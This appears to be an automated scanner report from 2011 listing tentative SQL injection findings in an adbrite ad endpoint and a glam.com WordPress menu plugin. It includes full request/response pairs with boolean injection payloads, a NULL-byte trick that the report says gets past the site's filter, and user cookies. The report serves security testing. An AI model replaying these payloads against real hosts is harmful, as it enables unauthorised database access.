GET /v0/ad?sid=1545288&zs=3732385f3930&ifr=1&ref=http%3A%2F%2Fwww.dailytelegraph.com.au%2Fnews%2Fbreaking-news%2Ftony-abbott-says-migration-proposals-are-weak%2Fstory-e6freuz0-1226045133021%3Ffrom%3Dpublic_rss&zx=1020&zy=22&ww=1041&wh=903&fl=1&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AXZBJEoMgEEXvwpoFQxwqtxFBJSJGQS21vXswxlTM9v33u7p7RSND9xXVap7aXjp0R3lVpWVHshFoZ0rfAAOBndaWB9AIkgAFAvRRE4LzykY1i3x5RCq4TOKu48sUSMp7EwiNTq9oL95Jmwt1RhkTiPBTCwnEgn9F%2B1c3sZ7j204lGcy%2B16nq6DozYzLb76lSd6w%2FtAQ75noK9DkX1kKIqV8%2B%2FTjJf%2FsII5FZq3r9%2FhDathc%3D"; b="%3A%3Ax4cw%2Cx4co%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQlvOljAoYtq6d4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C83ol2%2C1uo0%7Clkjpss%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:58 GMT
Set-Cookie: vsd=0@1@4dbeaa92@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:58 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk2a%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:58 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:58:58 GMT
Content-Length: 2784

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Color_Default = '008000';
function AdBrite_IAB_Zone_Test_Color(color) {
if (typeof(color) != 'string') return false;
if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false;
return color;
}
var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color);
var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color);
var AdBrite_Background_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Background_Color);
var AdBrite_Border_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Border_Color);
var AdBrite_URL_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_URL_Color);
var AdBrite_Title_Color_Processed = (AdBrite_Title_Color) ? AdBrite_Title_Color : AdBrite_Title_Color_Default;
var AdBrite_Text_Color_Processed = (AdBrite_Text_Color) ? AdBrite_Text_Color : AdBrite_Text_Color_Default;
var AdBrite_Background_Color_Processed = (AdBrite_Background_Color) ? AdBrite_Background_Color : AdBrite_Background_Color_Default;
var AdBrite_Border_Color_Processed = (AdBrite_Border_Color) ? AdBrite_Border_Color : AdBrite_Border_Color_Default;
var AdBrite_URL_Color_Pr
...[SNIP]...

1.2. http://ads2.adbrite.com/v0/ad [zs parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /v0/ad?sid=1545288&zs=3732385f3930%00'&ifr=1&ref=http%3A%2F%2Fwww.perthnow.com.au%2Fnews%2Ffresh-rooftop-protest-by-asylum-seekers-despite-crackdown%2Fstory-e6frg12c-1226045349903&zx=1009&zy=17&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:49:49 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1545288&zs=3732385f3930%00''&ifr=1&ref=http%3A%2F%2Fwww.perthnow.com.au%2Fnews%2Ffresh-rooftop-protest-by-asylum-seekers-despite-crackdown%2Fstory-e6frg12c-1226045349903&zx=1009&zy=17&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:49:50 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDdxKyMChj9_6PgEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:49:50 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 12:49:50 GMT
Set-Cookie: vsd=0@1@4dbea86e@www.perthnow.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:49:50 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C8721s%2C1uo0%7Clkkjn2%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:49:50 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:49:50 GMT
Content-Length: 2782

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Col
...[SNIP]...

1.3. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beauty.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 11934797%20or%201%3d1--%20 and 11934797%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=111934797%20or%201%3d1--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:08:41 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480434
Expires: Mon, 02 May 2011 13:08:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:44 GMT
Connection: close
Set-Cookie: PHPSESSID=kihrhceouthlq0lq0eabf3cfh5; path=/
Content-Length: 20937

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' style='color:white' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();' >Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='s
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=111934797%20or%201%3d2--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:08:44 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480548
Expires: Mon, 02 May 2011 13:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:45 GMT
Connection: close
Set-Cookie: PHPSESSID=b47m2m334o3grlji9rltom4l26; path=/
Content-Length: 2312

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://hair.glam.com/' title='Hair'>Hair</a></li><li class=''><a href='http://makeup.glam.com/' title='Makeup'>Makeup</a></li><li class=''><a href='http://skinbody.glam.com/' title='Skin &amp; Body'>Skin &amp; Body</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a hre
...[SNIP]...

1.4. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://celebrities.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 18059503%20or%201%3d1--%20 and 18059503%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118059503%20or%201%3d1--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:08:52 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480834
Expires: Mon, 02 May 2011 13:08:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:54 GMT
Connection: close
Set-Cookie: PHPSESSID=0sl1r9qqlf0h91p2it3aduov93; path=/
Content-Length: 20918

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118059503%20or%201%3d2--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:08:55 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480939
Expires: Mon, 02 May 2011 13:08:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:55 GMT
Connection: close
Set-Cookie: PHPSESSID=0me0tu8l8lc0npr6e7i4tr34q0; path=/
Content-Length: 2293

